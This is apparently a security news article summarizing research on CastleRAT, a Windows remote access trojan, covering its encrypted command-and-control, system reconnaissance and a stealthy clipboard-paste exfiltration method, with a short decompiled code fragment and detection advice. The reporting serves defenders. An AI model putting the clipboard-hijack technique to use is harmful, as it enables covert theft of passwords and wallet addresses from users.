A new Remote Access Trojan known as CastleRAT has emerged as a growing threat to Windows systems worldwide.
First observed around March 2025, this malware enables attackers to gain complete remote control over compromised machines.
The threat comes in two main builds: a lightweight Python version and a more powerful compiled C version, with the latter offering advanced capabilities including keystroke capture, screen grabs, and persistent installation methods.
CastleRAT communicates with its command-and-control server using RC4 encryption with a hardcoded key.
Once deployed, the malware collects system information such as computer name, username, machine GUID, public IP address, and product details, then transmits this data to the attacker.
The infected host receives instructions and additional tools from the C2 server, allowing the attacker to execute commands remotely.
Splunk security researchers identified that CastleRAT employs several sophisticated techniques mapped to the MITRE ATT&CK framework.
The malware gathers basic system details and uses free web services like ip-api.com to obtain public IP addresses for regular beaconing.
Clipboard Data Collection and Exfiltration
One notable technique involves clipboard data harvesting. CastleRAT launches multiple threads within its process, with each thread carrying out different malicious activities.
The clipboard collection thread targets users who often copy credentials or cryptocurrency addresses, making this an effective method for harvesting sensitive information like usernames, passwords, and wallet strings.
.webp "Hackers Using CastleRAT Malware to Attack Windows Systems and Gain Remote Access 3"){kind=tracking}
The malware hijacks the clipboard and simulates paste actions to exfiltrate data stealthily. Rather than opening network sockets or calling obvious network APIs, CastleRAT copies harvested information to the clipboard and invokes SendInput() to paste data into benign-looking applications.
.webp "Hackers Using CastleRAT Malware to Attack Windows Systems and Gain Remote Access 4")
This technique reduces noisy network artifacts and blends exfiltration into ordinary user activity, complicating detection efforts.
if (OpenClipboard (0164))
{
EmptyClipboard();
hMem = GlobalAlloc(0x2000u, v2 + 1);
Dest = GlobalLock(hMem);
strcpy(Dest, Source);
SetClipboardData(1u, hMem);
CloseClipboard();
pInputs[0].ki.wVk = VK_CONTROL;
pInputs[2].ki.wVk = 'V';
SendInput(4u, pInputs, 40);
}Organizations should monitor for unusual outbound connections, one-line PowerShell downloads, unexpected binaries in user folders, and signs of RC4-encrypted traffic to detect this threat.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
